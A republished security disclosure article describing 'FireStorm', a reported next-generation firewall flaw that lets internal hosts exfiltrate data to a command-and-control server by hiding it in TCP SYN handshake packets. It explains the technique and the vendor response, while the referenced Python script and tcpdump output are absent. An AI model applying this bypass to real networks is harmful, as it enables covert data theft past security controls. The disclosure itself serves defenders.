FireStorm: Severe Security Flaw Discovered in Next Generation Firewalls by David Leichner


FireStorm: Severe Security Flaw Discovered in Next Generation Firewalls

BugSec Group and Cynet discovered a severe vulnerability in Next Generation Firewalls. Head of Offensive Security Stas Volfus uncovered the vulnerability, dubbed FireStorm, which allows an internal entity or malicious code to interact and extract data out of the organization, completely bypassing the firewall limitation.

It was discovered that the firewalls are designed to permit full TCP handshake regardless of the packet destination, in order to gather enough content for it to identify which application protocol is being used (web-browsing/telnet etc.). This is applicable if the devices are configured, for example, to allow Web browsing (HTTP/S) traffic from the LAN environment to specific locations on the internet (URL Filtering). This is true even with a single location.

This allowed us to perform a full TCP handshake via the HTTP port with a C&C (Command and Control) server hosted by BugSec. From there, we were able to forge messages and tunnel them out through the TCP handshake process, bypassing the firewall to any destination on the Internet, regardless of firewall rules and client restrictions.


It is important to mention that any traffic that was sent to the C&C server after the TCP handshake process was blocked immediately by the firewall since the policy manager categorized our traffic as “Unknown-TCP” and the HTTP destination wasn’t allowed.

This flaw can be exploited by malware and hackers to communicate with unauthorized servers on the internet by taking advantage of the ability to perform the TCP handshake process with any destination. This basically completely removes the firewall block from the LAN to the outside world.

Together with Chief Technology Officer Idan Cohen, the team created a tool (which won’t be disclosed) that extracts sensitive data from the LAN, using only the TCP handshake. The tool allows full tunneling over TCP handshake.

A simple example of the vulnerability can be demonstrated using a python script located in the LAN, and a sniffer which is located on a C&C server. The client script sends TCP SYN packets with the string “This is a secret…” to the C&C server, and the server captures it. During our tests, we were able to successfully extract data proving the vulnerability.

Client script (python):


After running the client side python script, this is the result on the server (using TCPDUMP filter by SYN packets):


We disclosed the full details of the vulnerability to major vendors affected by the flaw. One of the vendors who replied, explained that they do not see this issue as a vulnerability because, by design, their firewall permits full TCP handshake in order to inspect the application type.

They said that once their state machine proceeded beyond the TCP handshake, they would recognize the application, matching a subsequent rule that applied to application traffic. The vendor added that if there was an application they did not recognize, they would treat the session as ‘unknown-TCP’ and, again, perform an additional security policy lookup to decide whether to allow or block the traffic.

We believe that this is a dangerous vulnerability and that monitor ability should be added to provide blocking capabilities on repeated suspicious requests and to provide the ability to block a direct connection between an internal host and an unauthenticated foreign host.


Bugsec Blog

This article was originally published on LinkedIn. You can find it here: LinkedIn

January 26, 2016


Hakin9 TEAM
Hakin9 is a monthly magazine dedicated to hacking and cybersecurity. In every edition, we try to focus on different approaches to show various techniques - defensive and offensive. This knowledge will help you understand how most popular attacks are performed and how to protect your data from them. Our tutorials, case studies and online courses will prepare you for the upcoming, potential threats in the cyber security world. We collaborate with many individuals and universities and public institutions, but also with companies such as Xento Systems, CATO Networks, EY, CIPHER Intelligence LAB, redBorder, TSG, and others.
Notify of

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Inline Feedbacks
View all comments
© HAKIN9 MEDIA SP. Z O.O. SP. K. 2023